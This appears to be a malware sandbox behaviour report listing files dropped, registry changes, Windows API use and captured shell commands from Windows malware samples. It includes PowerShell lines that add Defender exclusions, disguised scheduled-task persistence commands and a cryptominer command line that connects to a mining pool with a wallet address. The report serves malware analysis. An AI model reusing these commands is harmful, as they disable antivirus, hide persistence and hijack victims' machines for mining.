c:\users\user\appdata\local\temp\exeb93a.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\exeb93a.bat Synchronize,Write Data
c:\users\user\appdata\local\temp\h6q_mxj7.0.cs Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.cmdline Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.dll Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\h6q_mxj7.err Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.out Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\jusched.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\temp_script.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\~df01a2810d2fc46141.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\5080dc7a65db6a5960ecd874088f3328_bc00434159dae8351451cce9c748f5d7 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\cc42971b7939a9ca55c44cfc893d7c1d Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_0fc53b6d791a7d4e33083edc3ed14e9a Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_2f10f6ac1b30a30cd4f31e26cb4e9b13 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\5080dc7a65db6a5960ecd874088f3328_bc00434159dae8351451cce9c748f5d7 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\cc42971b7939a9ca55c44cfc893d7c1d Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_0fc53b6d791a7d4e33083edc3ed14e9a Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_2f10f6ac1b30a30cd4f31e26cb4e9b13 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\common softwares\1.30\1033.dll Generic Write,Read Attributes
c:\users\user\appdata\roaming\common softwares\1.30\decoder.dll Generic Write,Read Attributes
c:\users\user\appdata\roaming\common softwares\1.30\dfd0a61\winrar-x64-591.msi Generic Write,Read Attributes
c:\users\user\appdata\roaming\hackers.exe Generic Write,Read Attributes
c:\users\user\appdata\roaming\hydra free.exe Generic Write,Read Attributes
c:\users\user\appdata\roaming\miners\logs\client_20260313_041004.log Generic Write,Read Attributes
c:\users\user\appdata\roaming\miners\logs\client_20260326_230507.log Generic Write,Read Attributes
c:\users\user\appdata\roaming\native system provider\nativeservicesprovider 1.0.1\install\5713427\native services provider.msi Generic Write,Read Attributes
c:\users\user\appdata\roaming\native system provider\nativeservicesprovider 1.0.1\install\decoder.dll Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\6e7ac47\mservice x.msi Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\decoder.dll Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\holder0.aiph Generic Write,Read Attributes
c:\users\user\appdata\roaming\twitch.exe Generic Write,Read Attributes
c:\users\user\downloads\c:\programdata Synchronize,Write Attributes
c:\windows\__tmp_rar_sfx_access_check_1284734 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\windows\appcompat\programs\amcache.hve Read Data,Read Control,Write Data
c:\windows\appcompat\programs\amcache.hve Write Attributes
c:\windows\kmspico_setup.exe Generic Write,Read Attributes
c:\windows\kmspico_setup.exe Synchronize,Write Attributes
c:\windows\system32.vbs Generic Write,Read Attributes
c:\windows\system32.vbs Synchronize,Write Attributes
c:\windows\window.exe Generic Write,Read Attributes
c:\windows\window.exe Synchronize,Write Attributes
c:\windows\windows.bat Generic Write,Read Attributes
c:\windows\windows.bat Synchronize,Write Attributes
c:\windows\windows.vbs Generic Write,Read Attributes
c:\windows\windows.vbs Synchronize,Write Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\2bee30dc7a2cd28cc0137a80eecbe8e9fc77745e_0000042016 c:\users\user\downloads\2bee30dc7a2cd28cc0137a80eecbe8e9fc77745e_0000042016:*:Enabled:ipsec RegNtPreCreateKey
HKCU\software\winrar sfx::c:\programdata %ProgramData% RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\600276347abed96a481884d2b16907fe429efc61_0000045841 c:\users\user\downloads\600276347abed96a481884d2b16907fe429efc61_0000045841:*:Enabled:ipsec RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_1 쫁祳 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_1 戥硡 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_2 鮠㠡 RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_2  RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_2 氂 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_2 쓦 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_3 燡⴪ RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_3 ‡椤 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_3 蹃栶 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_3 ⚧椤 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_4 ﵾ꿂 RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_4 釓 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_4 ↄ RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_4 襠 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_5 僥䵏 RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_5 쾊姦 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_5 䏅壴 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_5 姦 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_6 裮₁ RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_6 毂퉈 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_6 퍚 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_6 ䷢퉈 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_7 㽹좸 RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_7 뎼䪩 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_7 ݇䮻 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_7 꾣䪩 RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_8 봉⧺ RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_8 ೞ쌋 RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_8 몈숙 RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_8 ቬ쌋 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_0 윣렴 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_0 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_0 ꢀĒ RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_0 d RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_1 衡႓ RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_1 将杰 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_1 틂晢 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_1 稦杰 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_2 ꮦ؃ RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\e6c49ad89c5d0476d967ce8ff3ebe1005bd10d1b_0000041863 c:\users\user\downloads\e6c49ad89c5d0476d967ce8ff3ebe1005bd10d1b_0000041863:*:Enabled:ipsec RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_2 틀컠 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_2 射쿲 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_2 컠 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_3 㧤牟 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_3 䢂㙑 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_3 왆㝃 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_3 溢㙑 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_4 鵲펆 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_4 鷁 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_4 䆈鳓 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_4 鷁 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_5 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_5 䞅Բ RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_5 쯊Р RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_5 挮Բ RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_6 ᣤ鹫 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_6 ﯈沢 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_6 甌涰 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_6 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_7 읰嘂 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_7 䮵퐓 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_7 n픁 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_7 垪퐓 RegNtPreCreateKey
HKCU\software\awyjmkjc::b1_8 紑텲 RegNtPreCreateKey
HKCU\software\awyjmkjc::b2_8 쳆㮃 RegNtPreCreateKey
HKCU\software\awyjmkjc::b3_8 窐㪑 RegNtPreCreateKey
HKCU\software\awyjmkjc::b4_8 퉴㮃 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_0 윣렴 RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_0 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_0 ꢀĒ RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_0 d RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_1 鵥֎ RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_1 䤂牭 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_1 쟆獿 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_1 漢牭 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_2 膮ⰹ RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_2  RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_2 瘌 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_2 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_3 ᫰ፆ RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_3 殖坈 RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\f4e1698474aaf2848319904dcb4aaf6a9587ad58_0000038090 c:\users\user\downloads\f4e1698474aaf2848319904dcb4aaf6a9587ad58_0000038090:*:Enabled:ipsec RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_3 噚 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_3 䶶坈 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_4 쥢蟲 RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_4 ꗏ즵 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_4 ᖘ좧 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_4 뵼즵 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_5 韾⢊ RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_5 ࢑㰣 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_5 蓞㴱 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_5 ⰺ㰣 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_6 廌屙 RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_6 뷠꺐 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_6 ㌤꾂 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_6 鯀꺐 RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_7 驔ꋯ RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_7 ᚑ⃾ RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_7 ꉪ⇬ RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_7 ઎⃾ RegNtPreCreateKey
HKCU\software\alsrpuhq::f1_8 픱禚 RegNtPreCreateKey
HKCU\software\alsrpuhq::f2_8 擦鍫 RegNtPreCreateKey
HKCU\software\alsrpuhq::f3_8 튰鉹 RegNtPreCreateKey
HKCU\software\alsrpuhq::f4_8 穔鍫 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\software\microsoft\systemcertificates\authroot\certificates\afe5d244a8d1194230ff479fe2f897bbcd7a8cb4::blob ㄛ熰㙀ᓌ鄶쒭﴾ᣬ0ᙶ蛍倇㶌དྷﺾ睨㔷珼潴ꥂ拽메爻Ӱ鑹꿥杗쇒妖隄 T到ࠆثԁ܅ȃࠆثԁ܅̃ਆثЁ舁਷Ѓࠆثԁ܅Ѓࠆثԁ܅؃ࠆثԁ܅܃ࠆثԁ܅ăࠆثԁ܅ࠃSC䄰∰ఆثЁ눁ıĂąሰူਆثЁ舁㰷āȃ쀀ᬰԆ腧Č〃〒ؐ⬊ĆĄ㞂 RegNtPreCreateKey
HKLM\software\microsoft\systemcertificates\authroot\certificates\afe5d244a8d1194230ff479fe2f897bbcd7a8cb4::blob \ကↂﮏ玑搾欓燥垟ꇃ䓒톨䈙P齇뮗竍뒌㧋퓃Ⱗ揟乷렝씐麨꾻ɾ悔萼궎㣮㋙퐲b 쓡軥⧆ᬩㅠݿ煆嶸꡾嬍✇挴䭓됲㐂 :Sectigo (formerly Comodo CA)S RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 酨訵ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 嗉訵ǜ RegNtPreCreateKey
HKCU\software\ej-technologies\exe4j\pids::c:\users\user\downlo~1\5b03f2~1 RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\04f49b62291df27003be9756d79530844c0cc8c3_0000044223 c:\users\user\downloads\04f49b62291df27003be9756d79530844c0cc8c3_0000044223:*:Enabled:ipsec RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_0 윣렴 RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_0 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_0 ꢀĒ RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_0 d RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_1 饯ᖎ RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_1 䴈扭 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_1 쏌捿 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_1 欨扭 RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_2 覺హ RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_2 쓚 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_2 縘었 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_2 훼쓚 RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_3 ᛆ捆 RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_3 枠❈ RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_3 ♚ RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_3 䆀❈ RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_4 RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_4 뗧覵 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_4 ְ袧 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_4 굔覵 RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_5 ꏜ RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_5 㲳 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_5 냼 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_5 ᠘ RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_6 䚠뱙 RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_6 ꖌ亐 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_6 ⭈侂 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_6 莬亐 RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_7 羪㋬ RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_7 냽 RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_7 䞔뇯 RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_7 냽 RegNtPreCreateKey
HKCU\software\ahstyuhy::l1_8 連 RegNtPreCreateKey
HKCU\software\ahstyuhy::l2_8 䒶፫ RegNtPreCreateKey
HKCU\software\ahstyuhy::l3_8 ቹ RegNtPreCreateKey
HKCU\software\ahstyuhy::l4_8 娄፫ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 厷阭ǜ RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\tracing::enableconsoletracing RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey

30 additional registry modifications are not displayed above.

Windows API Usage

Category API
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
  • OutputDebugString
User Data Access
  • GetComputerName
  • GetComputerNameEx
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
  • OpenClipboard
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAdjustPrivilegesToken
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMailslotFile
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushBuffersFile
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtGetNlsSectionPtr
  • ntdll.dll!NtLoadKeyEx
  • ntdll.dll!NtLockFile
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueueApcThread
  • ntdll.dll!NtQueueApcThreadEx2
  • ntdll.dll!NtReadFile

172 additional items are not displayed above.

Process Shell Execute
  • CreateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges
Network Winsock2
  • WSAConnect
  • WSARecv
  • WSASend
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • bind
  • closesocket
  • freeaddrinfo
  • getaddrinfo
  • gethostname
  • recv
  • send
  • setsockopt
  • socket
Network Info Queried
  • GetAdaptersAddresses
  • GetNetworkParams
Service Control
  • OpenSCManager
  • OpenService
  • StartServiceCtrlDispatcher
Network Wininet
  • InternetOpen
  • InternetOpenUrl
  • InternetReadFile
Keyboard Access
  • GetKeyState
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ReadProcessMemory
  • VirtualAllocEx
Network Urlomon
  • URLDownloadToFile
Cert Store Read
  • CertEnumCertificatesInStore
  • CertOpenStore
Cert Store Write
  • CertAddEncodedCertificateToStore
Process Terminate
  • TerminateProcess
Network Winhttp
  • WinHttpOpen

Shell Command Execution

powershell -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"
c:\users\user\downloads\Altruistics.exe "c:\users\user\downloads\Altruistics.exe" "-u" "-g" ":\sandbox_live\SandboxTool.exe"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\dw20.exe dw20.exe -x -s 708
D:\Windows Files 381.529\xmrig.exe (NULL)
D:\Windows Files 381.529\Windows Files Manager User mode.exe (NULL)
schtasks.exe /create /f /RL HIGHEST /sc onlogon /tn "MicrosoftEdgeUpdateTaskMachineCoreUE" /tr "rundll32.exe C:\Windows\System32\vcruntime143_threads.dll,Update"
schtasks.exe /create /f /RL HIGHEST /sc hourly /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUI" /tr "rundll32.exe C:\Windows\System32\vcruntime143_threads.dll,Update"
schtasks /delete /f /tn "MicrosoftEdgeUpdateTaskMachineCoreUO"
C:\Users\Lueocmoq\AppData\Local\Temp\temp_script.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"
C:\WINDOWS\system32\cmd.exe /C for %I in ("c:\Users\user\downloads\5b03f261746e2d03b295054a22829f6308cb5391_0000304112") do @echo %~sI
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Jebndjsj\AppData\Local\Temp\h6q_mxj7.cmdline"
C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -o pool.hashvault.pro:443 -u 43r3UGUXLLqSb6fxHttvTsRujqbxZ1pbxcjd5W6EUJhuGBrkWFsEAfKj87E6LRLGXbX96GwdydczP4JapRrtsipkGp2PVjC -p BotNet --tls --cpu-max-threads-hint=30
C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -o pool.hashvault.pro:443 -u 43r3UGUXLLqSb6fxHttvTsRujqbxZ1pbxcjd5W6EUJhuGBrkWFsEAfKj87E6LRLGXbX96GwdydczP4JapRrtsipkGp2PVjC -p BotNet --tls --cpu-max-threads-hint=91